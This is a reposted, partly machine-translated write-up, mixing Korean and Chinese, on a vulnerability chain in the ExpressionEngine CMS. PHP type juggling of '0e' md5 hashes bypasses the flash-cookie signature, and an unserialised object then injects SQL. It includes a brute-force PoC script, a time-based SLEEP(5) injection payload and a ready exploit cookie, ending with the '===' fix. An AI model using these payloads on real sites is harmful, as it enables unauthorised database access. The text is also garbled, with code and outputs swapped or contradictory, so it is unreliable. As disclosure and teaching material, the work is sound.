>  기사  >  백엔드 개발  >  Weak Type과 Object Injection을 이용한 보안침해 공유

Weak Type과 Object Injection을 이용한 보안침해 공유

*文
*文원래의
2017-12-23 10:55:301540검색

보안은 웹사이트를 시작할 때 직면하는 가장 중요한 문제입니다. 절대적인 안전은 없고 끊임없는 공격과 방어의 대결만이 있을 뿐이다. 사용자가 제출한 데이터를 신뢰하지 않는 것이 첫 번째 목적입니다. 이 기사에서는 모든 사람에게 웹사이트 보안에 대한 보다 명확한 개념을 제공하기 위해 약한 유형과 개체 삽입을 사용한 보안 침입을 공유합니다.

최근 대상의 취약점을 검색하던 중 CMS 플랫폼인 Expression Engine을 실행하는 호스트를 발견했습니다. 이 특정 애플리케이션은 사용자 이름으로 "admin"을 사용하여 애플리케이션에 로그인하려고 시도했을 때 서버가 PHP 직렬 데이터가 포함된 쿠키로 응답했기 때문에 관심을 끌었습니다. 이전에 말했듯이 사용자가 제공한 데이터를 역직렬화하면 경우에 따라 코드 실행과 같은 예상치 못한 결과가 발생할 수 있습니다. 그래서 무턱대고 테스트하기보다는 먼저 이 CMS의 소스코드를 다운로드 받을 수 있는지 잘 살펴보고, 그 코드를 이용하여 데이터를 직렬화하는 과정에서 어떤 일이 일어났는지 파악한 후 로컬 빌드를 시작하기로 했습니다. 테스트용으로 복사하세요.

이 CMS의 소스 코드를 얻은 후 grep 명령을 사용하여 쿠키가 사용되는 위치를 찾아 "./system/ee/legacy/libraries/Session.php" 파일을 찾아 쿠키가 있음을 확인했습니다. 사용자 세션 유지 관리에 사용되는 이 결과는 매우 의미가 있습니다. Session.php를 자세히 살펴보면 직렬화된 데이터를 역직렬화하는 다음 메서드를 발견했습니다.

  protected function _prep_flashdata()
  {
    if ($cookie = ee()->input->cookie('flash'))
    {
      if (strlen($cookie) > 32)
      {
        $signature = substr($cookie, -32);
        $payload = substr($cookie, 0, -32);
        if (md5($payload.$this->sess_crypt_key) == $signature)
        {
          $this->flashdata = unserialize(stripslashes($payload));
          $this->_age_flashdata();
          return;
        }
      }
    }
    $this->flashdata = array();
  }

코드를 통해 쿠키가 구문 분석되기 전에 일련의 단계가 실행되는 것을 볼 수 있습니다. 그런 다음 코드의 1293번째 줄에서 역직렬화가 발생합니다. 먼저 쿠키를 살펴보고 "unserialize()"를 호출할 수 있는지 확인해 보겠습니다.

a%3A2%3A%7Bs%3A13%3A%22%3Anew%3Ausername%22%3Bs%3A5%3A%22admin%22%3Bs%3A12%3A%22%3Anew%3Amessage%22%3Bs%3A38%3A%22That+is+the+wrong+username+or+password%22%3B%7D3f7d80e10a3d9c0a25c5f56199b067d4

디코딩된 URL은 다음과 같습니다.

a:2:{s:13:":new:username";s:5:"admin";s:12:":new:message";s:38:"That is the wrong username or password";}3f7d80e10a3d9c0a25c5f56199b067d4

플래시 쿠키가 있으면 다음으로 로드합니다. "$cookie" 변수(라인 1284의 코드)를 입력하고 계속해서 라인을 따라갑니다. 다음으로 쿠키 데이터의 길이가 32(라인 1286의 코드)보다 큰지 확인하고 실행을 계속합니다. 이제 "substr()"을 사용하여 쿠키 데이터의 마지막 32자를 가져와 "$signature" 변수에 저장한 다음 아래와 같이 나머지 쿠키 데이터를 "$payload"에 저장합니다.

$ php -a
Interactive mode enabled
php > $cookie = 'a:2:{s:13:":new:username";s:5:"admin";s:12:":new:message";s:38:"That is the wrong username or password";}3f7d80e10a3d9c0a25c5f56199b067d4';
php > $signature = substr($cookie, -32);
php > $payload = substr($cookie, 0, -32);
php > print "Signature: $signature\n";
Signature: 3f7d80e10a3d9c0a25c5f56199b067d4
php > print "Payload: $payload\n";
Payload: prod_flash=a:2:{s:13:":new:username";s:5:"admin";s:12:":new:message";s:29:"Invalid username or password.";}
php >

이제 라인 1291의 코드에서 "$payload.$this->sess_crypt_key"의 md5 해시를 계산하고 이를 비교를 위해 위에 표시된 것처럼 쿠키 끝에 제공한 "$signature"와 비교합니다. 코드를 잠깐 살펴보면 "$this->sess_crypt_cookie" 값이 설치 중에 생성된 "./system/user/config/config.php" 파일에서 전달된다는 것을 알 수 있습니다.

./system/user/config/config.php:$config['encryption_key'] = '033bc11c2170b83b2ffaaff1323834ac40406b79';

이를 수동으로 정의해 보겠습니다. "$this->sess_crypt_key"를 "$salt"로 지정하고 md5 해시 값을 확인하세요.

php > $salt = '033bc11c2170b83b2ffaaff1323834ac40406b79';
php > print md5($payload.$salt);
3f7d80e10a3d9c0a25c5f56199b067d4
php >


md5 해시 값이 "$signature"와 같은지 확인하세요. 이 검사를 수행하는 이유는 "$payload"(즉, 직렬화된 데이터) 값이 변조되지 않았는지 확인하기 위한 것입니다. 따라서 이 검사는 이러한 변조를 방지하는 데 충분합니다. 그러나 PHP는 약한 유형의 언어이므로 비교를 수행할 때 몇 가지 함정이 있습니다.

느슨한 비교는 "캡사이징"으로 이어집니다.

페이로드를 구성하는 좋은 방법을 얻기 위해 몇 가지 느슨한 비교 사례를 살펴보겠습니다. 어어어어

출력:

<?php 
  
$a = 1;
$b = 1;
  
var_dump($a);
var_dump($b);
  
if ($a == $b) { print "a and b are the same\n"; }
else { print "a and b are NOT the same\n"; }
?>

PHP는 비교 작업에 "유용"하고 비교 중에 문자열을 정수로 변환하는 것 같습니다. 마지막으로 이제 과학적 표기법으로 작성된 정수처럼 보이는 두 문자열을 비교할 때 어떤 일이 발생하는지 살펴보겠습니다.

$ php steps.php
int(1)
int(1)
a and b are the same

Output:

<?php 
  
$a = 1;
$b = 0;
  
var_dump($a);
var_dump($b);
  
if ($a == $b) { print "a and b are the same\n"; }
else { print "a and b are NOT the same\n"; }
  
?>


위 결과에서 볼 수 있듯이, a" 및 변수 "$b"는 둘 다 문자열 유형이고 분명히 다른 값을 갖습니다. 완화된 비교 연산자를 사용하면 "0ex"가 PHP에서 변환되기 때문에 비교가 true로 평가됩니다. 정수인 경우 항상 0입니다. . 이것을 타입 저글링이라고 합니다.

Type Juggling

이 새로운 지식을 바탕으로 직렬화된 데이터를 조작하는 것을 방지하는 검사를 다시 살펴보겠습니다.

$ php steps.php
int(1)
int(0)
a and b are NOT the same


여기서 "$ 페이로드"를 제어할 수 있습니다. 따라서 "$this->sess_crypt_key"의 md5 값이 0e로 시작하고 모든 숫자로 끝나는 문자열이거나 "$signature" "$signature" 값이 되는 페이로드를 찾을 수 있다면 MD5 해시 값을 0e로 시작하고 모든 숫자로 끝나는 값으로 설정하면 이 검사를 성공적으로 우회할 수 있습니다.

이 아이디어를 테스트하기 위해 온라인에서 찾은 일부 코드를 수정했습니다. "조작된" 페이로드가 나타날 때까지 "md5($payload.$this->sess_crypt_key)"를 무차별 대입하여 실행합니다. 원본을 살펴보겠습니다." $payload "는 다음과 같습니다.

<?php 
  
$a = "these are the same";
$b = "these are the same";
  
var_dump($a);
var_dump($b);
  
if ($a == $b) { print "a and b are the same\n"; }
else { print "a and b are NOT the same\n"; }
  
?>


새 "$payload" 변수에는 "잘못된 사용자 이름 또는 비밀번호"라고 표시되는 반면 제가 표시하려는 내용은 "taquito"입니다.

序列化数组的第一个元素“[:new:username] => admin”似乎是一个可以创建一个随机值的好地方,所以这就是我们的爆破点。

注意:这个PoC是在我本地离线工作,因为我有权访问我自己的实例“$ this-> sess_crypt_key”,如果我们不知道这个值,那么我们就只能在线进行爆破了。

<?php
set_time_limit(0);
define(&#39;HASH_ALGO&#39;, &#39;md5&#39;);
define(&#39;PASSWORD_MAX_LENGTH&#39;, 8);
$charset = &#39;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&#39;;
$str_length = strlen($charset);
function check($garbage)
{
    $length = strlen($garbage);
    $salt = "033bc11c2170b83b2ffaaff1323834ac40406b79";
    $payload = &#39;a:2:{s:13:":new:username";s:&#39;.$length.&#39;:"&#39;.$garbage.&#39;";s:12:":new:message";s:7:"taquito";}&#39;;
    #echo "Testing: " . $payload . "\n";
        $hash = md5($payload.$salt);
        $pre = "0e";
    if (substr($hash, 0, 2) === $pre) {
        if (is_numeric($hash)) {
          echo "$payload - $hash\n";
        }
      }
}
function recurse($width, $position, $base_string)
{
        global $charset, $str_length;
        for ($i = 0; $i < $str_length; ++$i) {
                if ($position  < $width - 1) {
                        recurse($width, $position + 1, $base_string . $charset[$i]);
                }
                check($base_string . $charset[$i]);
        }
}
for ($i = 1; $i < PASSWORD_MAX_LENGTH + 1; ++$i) {
        echo "Checking passwords with length: $i\n";
        recurse($i, 0, &#39;&#39;);
}
?>

   


当运行上面的代码后,我们得到了一个修改过的“$ payload”的 md5哈希值并且我们的 “$ this-> sess_crypt_key”的实例是以0e开头,并以数字结尾:

$ php poc1.php
Checking passwords with length: 1
Checking passwords with length: 2
Checking passwords with length: 3
Checking passwords with length: 4
Checking passwords with length: 5
a:2:{s:13:":new:username";s:5:"dLc5d";s:12:":new:message";s:7:"taquito";} - 0e553592359278167729317779925758

   


让我们将这个散列值与任何“$ signature”的值(我们所能够提供的)进行比较,该值也以0e开头并以所有数字结尾:

<?php
$a = "0e553592359278167729317779925758";
$b = "0e222222222222222222222222222222";
var_dump($a);
var_dump($b);
if ($a == $b) { print "a and b are the same\n"; }
else { print "a and b are NOT the same\n"; }
?>

Output:

$ php steps.php
string(32) "0e553592359278167729317779925758"
string(32) "0e222222222222222222222222222222"
a and b are the same

   


正如你所看到的,我们已经通过(滥用)Type Juggling成功地修改了原始的“$ payload”以包含我们的新消息“taquito”。

当PHP对象注入与弱类型相遇会得到什么呢?SQLi么?

虽然能够在浏览器中修改显示的消息非常有趣,不过让我们来看看当我们把我们自己的任意数据传递到“unserialize()”后还可以做点什么。 为了节省自己的一些时间,让我们修改一下代码:

if(md5($ payload。$ this-> sess_crypt_key)== $ signature)

修改为:if (1)

上述代码在“./system/ee/legacy/libraries/Session.php”文件中,修改之后,可以在执行“unserialize()”时,我们不必提供有效的签名。

现在,已知的是我们可以控制序列化数组里面“[:new:username] => admin”的值,我们继续看看“./system/ee/legacy/libraries/Session.php”的代码,并注意以下方法:

 function check_password_lockout($username = &#39;&#39;)
 {
   if (ee()->config->item(&#39;password_lockout&#39;) == &#39;n&#39; OR
     ee()->config->item(&#39;password_lockout_interval&#39;) == &#39;&#39;)
   {
     return FALSE;
   }
   $interval = ee()->config->item(&#39;password_lockout_interval&#39;) * 60;
   $lockout = ee()->db->select("COUNT(*) as count")
     ->where(&#39;login_date > &#39;, time() - $interval)
     ->where(&#39;ip_address&#39;, ee()->input->ip_address())
     ->where(&#39;username&#39;, $username)
     ->get(&#39;password_lockout&#39;);
   return ($lockout->row(&#39;count&#39;) >= 4) ? TRUE : FALSE;
 }

   


这个方法没毛病,因为它在数据库中检查了提供的“$ username”是否被锁定为预认证。 因为我们可以控制“$ username”的值,所以我们应该能够在这里注入我们自己的SQL查询语句,从而导致一种SQL注入的形式。这个CMS使用了数据库驱动程序类来与数据库进行交互,但原始的查询语句看起来像这样(我们可以猜的相当接近):

SELECT COUNT(*) as count FROM (`exp_password_lockout`) WHERE `login_date` > &#39;$interval&#39; AND `ip_address` = &#39;$ip_address&#39; AND `username` = &#39;$username&#39;;

   


修改“$payload”为:

a:2:{s:13:":new:username";s:1:"&#39;";s:12:":new:message";s:7:"taquito";}

   


并将其发送到页面出现了如下错误信息,但由于某些原因,我们什么也没有得到……

“Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line”

   


不是我想要的类型…

经过一番搜索后,我在“./system/ee/legacy/database/DB_driver.php”中看到了以下代码:

 function escape($str)
 {
   if (is_string($str))
   {
     $str = "&#39;".$this->escape_str($str)."&#39;";
   }
   elseif (is_bool($str))
   {
     $str = ($str === FALSE) ? 0 : 1;
   }
   elseif (is_null($str))
   {
     $str = &#39;NULL&#39;;
   }
   return $str;
 }

   


在第527行,我们看到程序对我们提供的值执行了“is_string()”检查,如果它返回了true,我们的值就会被转义。 我们可以通过在函数的开头和结尾放置“var_dump”并检查输出来确认这里到底发生了什么:

前:

string(1) "y"
int(1)
int(1)
int(1)
int(0)
int(1)
int(3)
int(0)
int(1)
int(1486399967)
string(11) "192.168.1.5"
string(1) "&#39;"
int(1)

   


后:

string(3) "&#39;y&#39;"
int(1)
int(1)
int(1)
int(0)
int(1)
int(3)
int(0)
int(1)
int(1486400275)
string(13) "&#39;192.168.1.5&#39;"
string(4) "&#39;\&#39;&#39;"
int(1)

   


果然,我们可以看到我们的“'”的值已经被转义,现在是“\'”。 幸运的是,对我们来说,我们还有办法。

转义检查只是检查看看“$ str”是一个字符串还是一个布尔值或是null; 如果它匹配不了任何这几个类型,“$ str”将返回非转义的值。 这意味着如果我们提供一个“对象”,那么我们应该能够绕过这个检查。 但是,这也意味着接下来我们需要搜索一个我们可以使用的对象。

自动加载给了我希望!

通常,当我们寻找可以利用unserialize的类时,我们通常使用魔术方法(如“__wakeup”或“__destruct”)来寻找类,但是有时候应用程序实际上会使用自动加载器。 自动加载背后的一般想法是,当一个对象被创建后,PHP就会检查它是否知道该类的任何东西,如果不是,它就会自动加载这个对象。 对我们来说,这意味着我们不必依赖包含“__wakeup”或“__destruct”方法的类。 我们只需要找到一个调用我们控制的“__toString”的类,因为应用程序会尝试将 “$ username”变量作为字符串使用。

寻找如这个文件中所包含的类:

“./system/ee/EllisLab/ExpressionEngine/Library/Parser/Conditional/Token/Variable.php”:

   


<?php
  namespace EllisLab\ExpressionEngine\Library\Parser\Conditional\Token;
  class Variable extends Token {
    protected $has_value = FALSE;
    public function __construct($lexeme)
    {
      parent::__construct(&#39;VARIABLE&#39;, $lexeme);
    }
    public function canEvaluate()
    {
      return $this->has_value;
    }
    public function setValue($value)
    {
      if (is_string($value))
      {
        $value = str_replace(
          array(&#39;{&#39;, &#39;}&#39;),
          array(&#39;{&#39;, &#39;}&#39;),
          $value
        );
      }
      $this->value = $value;
      $this->has_value = TRUE;
    }
    public function value()
    {
      // in this case the parent assumption is wrong
      // our value is definitely *not* the template string
      if ( ! $this->has_value)
      {
        return NULL;
      }
      return $this->value;
    }
    public function __toString()
    {
      if ($this->has_value)
      {
        return var_export($this->value, TRUE);
      }
      return $this->lexeme;
    }
  }
  // EOF

   


这个类看起来非常完美! 我们可以看到对象使用参数“$lexeme”调用了方法“__construct”,然后调用“__toString”,将参数“$ lexeme”作为字符串返回。 这正是我们正在寻找的类。 让我们组合起来快速为我们创建序列化对象对应的POC:

<?php
namespace EllisLab\ExpressionEngine\Library\Parser\Conditional\Token;
class Variable {
        public $lexeme = FALSE;
}
$x = new Variable();
$x->lexeme = "&#39;";
echo serialize($x)."\n";
?>
Output:
$ php poc.php
O:67:"EllisLab\ExpressionEngine\Library\Parser\Conditional\Token\Variable":1:{s:6:"lexeme";s:1:"&#39;";}

   


经过几个小时的试验和错误尝试,最终得出一个结论:转义在搞鬼。 当我们将我们的对象添加到我们的数组中后,我们需要修改上面的对象(注意额外的斜线):

a:1:{s:13:":new:username";O:67:"EllisLab\\\\\ExpressionEngine\\\\\Library\\\\\Parser\\\\\Conditional\\\\\Token\\\\Variable":1:{s:6:"lexeme";s:1:"&#39;";}}

   


我们在代码之前插入用于调试的“var_dump”,然后发送上面的payload,显示的信息如下:

string(3) "&#39;y&#39;"
int(1)
int(1)
int(1)
int(0)
int(1)
int(3)
int(0)
int(1)
int(1486407246)
string(13) "&#39;192.168.1.5&#39;"
object(EllisLab\ExpressionEngine\Library\Parser\Conditional\Token\Variable)#177 (6) {
  ["has_value":protected]=>
  bool(false)
  ["type"]=>
  NULL
  ["lexeme"]=>
  string(1) "&#39;"
  ["context"]=>
  NULL
  ["lineno"]=>
  NULL
  ["value":protected]=>
  NULL
}

   


注意,现在我们有了一个“对象”而不是一个“字符串”,“lexeme”的值是我们的非转义“'”的值!可以在页面中更进一步来确认:

<h1>Exception Caught</h1>
<h2>SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#39;&#39;&#39; at line 5:
SELECT COUNT(*) as count
FROM (`exp_password_lockout`)
WHERE `login_date` &gt;  1486407246
AND `ip_address` =  &#39;192.168.1.5&#39;
AND `username` =  &#39;</h2>
mysqli_connection.php:122

   


Awww! 我们已经成功地通过PHP对象注入实现了SQL注入,从而将我们自己的数据注入到了SQL查询语句中!

PoC!

最后,我创建了一个PoC来将Sleep(5)注入到数据库。 最让我头疼的就是应用程序中计算“md5()”时的反斜杠的数量与成功执行“unserialize()”需要的斜杠数量, 不过,一旦发现解决办法,就可以导致以下结果:

<?php
set_time_limit(0);
define(&#39;HASH_ALGO&#39;, &#39;md5&#39;);
define(&#39;garbage_MAX_LENGTH&#39;, 8);
$charset = &#39;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&#39;;
$str_length = strlen($charset);
function check($garbage)
{
    $length = strlen($garbage) + 26;
    $salt = "033bc11c2170b83b2ffaaff1323834ac40406b79";
    $payload = &#39;a:1:{s:+13:":new:username";O:67:"EllisLab\\\ExpressionEngine\\\Library\\\Parser\\\Conditional\\\Token\\\Variable":1:{s:+6:"lexeme";s:+&#39;.$length.&#39;:"1 UNION SELECT SLEEP(5) # &#39;.$garbage.&#39;";}}&#39;;
    #echo "Testing: " . $payload . "\n";
        $hash = md5($payload.$salt);
        $pre = "0e";
    if (substr($hash, 0, 2) === $pre) {
        if (is_numeric($hash)) {
          echo "$payload - $hash\n";
        }
      }
}
function recurse($width, $position, $base_string)
{
        global $charset, $str_length;
        for ($i = 0; $i < $str_length; ++$i) {
                if ($position  < $width - 1) {
                        recurse($width, $position + 1, $base_string . $charset[$i]);
                }
                check($base_string . $charset[$i]);
        }
}
for ($i = 1; $i < garbage_MAX_LENGTH + 1; ++$i) {
        echo "Checking garbages with length: $i\n";
        recurse($i, 0, &#39;&#39;);
}
?>

Output:

$ php poc2.php
a:1:{s:+13:":new:username";O:67:"EllisLab\\ExpressionEngine\\Library\\Parser\\Conditional\\Token\\Variable":1:{s:+6:"lexeme";s:+31:"1 UNION SELECT SLEEP(5) # v40vP";}} - 0e223968250284091802226333601821

   


以及我们发送到服务器的payload(再次注意那些额外的斜杠):

Cookie: exp_flash=a%3a1%3a{s%3a%2b13%3a"%3anew%3ausername"%3bO%3a67%3a"EllisLab\\\\\ExpressionEngine\\\\\Library\\\\\Parser\\\\\Conditional\\\\\Token\\\\\Variable"%3a1%3a{s%3a%2b6%3a"lexeme"%3bs%3a%2b31%3a"1+UNION+SELECT+SLEEP(5)+%23+v40vP"%3b}}0e223968250284091802226333601821

   


五秒后我们就得到了服务器的响应。

修复方案!

这种类型的漏洞修复真的可以归结为一个“=”,将:if (md5($payload.$this->sess_crypt_key) == $signature)替换为:if (md5($payload.$this->sess_crypt_key) === $signature)

除此之外,不要“unserialize()”用户提供的数据!

相关推荐:

PHPer必知:6个常见的PHP安全性攻击!

php 安全过滤函数代码_PHP教程

php 安全的URL字符串base64编码和解码实例代码

위 내용은 Weak Type과 Object Injection을 이용한 보안침해 공유의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.